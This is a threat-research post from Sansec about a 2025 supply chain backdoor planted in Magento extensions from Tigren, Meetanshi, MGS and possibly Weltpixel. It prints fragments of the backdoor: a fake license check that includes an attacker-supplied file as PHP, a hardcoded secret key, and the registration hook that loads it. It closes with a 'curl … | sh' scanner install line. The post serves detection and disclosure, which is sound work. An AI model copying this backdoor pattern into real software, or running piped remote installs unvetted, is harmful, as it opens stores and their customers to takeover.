Sansec logo

Backdoor found in popular ecommerce components

Sansec

by Sansec Forensics Team

Published in Threat Research − May 01, 2025

Multiple vendors were hacked in a coordinated supply chain attack, Sansec found 21 applications with the same backdoor. Curiously, the malware was injected 6 years ago, but came to life this week as attackers took full control of ecommerce servers. Sansec estimates that between 500 and 1000 stores are running backdoored software.

Backdoor found in popular ecommerce components

Hundreds of stores, including a $40 billion multinational, are running backdoored versions of popular ecommerce software. We found that the backdoor is actively used since at least April 20th. Sansec identified these backdoors in the following packages which were published between 2019 and 2022.

VendorPackage
TigrenAjaxsuite
TigrenAjaxcart
TigrenAjaxlogin
TigrenAjaxcompare
TigrenAjaxwishlist
TigrenMultiCOD
MeetanshiImageClean
MeetanshiCookieNotice
MeetanshiFlatshipping
MeetanshiFacebookChat
MeetanshiCurrencySwitcher
MeetanshiDeferJS
MGSLookbook
MGSStoreLocator
MGSBrand
MGSGDPR
MGSPortfolio
MGSPopup
MGSDeliveryTime
MGSProductTabs
MGSBlog

We established that Tigren, Magesolution (MGS) and Meetanshi servers have been breached and that attackers were able to inject backdoors on their download servers.

This hack is called a Supply Chain Attack, which is one of the worst types. By hacking these vendors, the attacker gained access to all of their customers' stores. And by proxy, to all of the customers that visit these stores.

We also found a backdoored version of the Weltpixel GoogleTagManager extension, but we have not been able to establish whether Weltpixel or these particular stores got compromised.

Check your store now

If you use software from these vendors, you should check your store now. The backdoor consists of a fake license check in a file called License.php or LicenseApi.php.

The evil is in the adminLoadLicense function, which executes $licenseFile as PHP.

protected function adminLoadLicense($licenseFile)
{
    // ...
    $data = include_once($licenseFile);
    // ...
}

The $licenseFile can be controlled by the attacker using the adminUploadLicense function. In versions from 2019 this does not require any authentication. In later versions this requires a secret key that must match the hardcoded checksum and salt:

class License {

    const SECURE_KEY = '83ba291cd9201e9a28173741bac82745';
    const SIGN_KEY   = 'afa3a778bd34181c44f2dfe1de8aff05';

The fake license check is explicitly activated via registration.php.

<?php
\Magento\Framework\Component\ComponentRegistrar::register(
    \Magento\Framework\Component\ComponentRegistrar::MODULE,
    'Meetanshi_CookieNotice',
    __DIR__
);
if (file_exists(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php')) {
    include_once(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php');
}

The backdoor code is the same for all found packages, except for:

  • The authorization checksum (unique per vendor)
  • The backdoor path (unique per module)
  • The license filename (unique per vendor)
VendorMeetanshiMGSTigrenWeltpixel
Secure Key05aafe4...83ba291...e7c057dd...47946a7...
Sign Keyf31d647...afa3a77...313bedf...52dd8df...
License Filenamemtn-licensemgs-licenseapj-licensewlp-license

Recommendations

Sansec’s eComscan detects this malware out of the box. If you find a backdoor on your store, you can safely remove the fake License file. If you still have the original source in a zip file (particularly WeltPixel), please share it with us for further analysis.

At this point, we recommend to be extremely cautious when using software from these vendors.

Vendor responses

Magesolution (MGS) did not respond, but the backdoored packages can still be downloaded from their site as of Apr 30th.

Tigren denies to have been hacked, but the backdoored packages are still available on their site as of Apr 30th.

Meetanshi claims that their software has not been tampered with, but confirmed that their server got hacked.

Further research

It is rare that a backdoor remains undetected for 6 years, but is even stranger that actual abuse has only started now.

We will update this post when we learn more.

Need help or want a second opinion? Get in touch.

Credits

Special thanks to Alexandra Zota for discovering the initial abuse.

Read more

Scan your store now
for malware & vulnerabilities

$ curl ecomscan.com | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security

Terms & Conditions
Privacy & Cookie Policy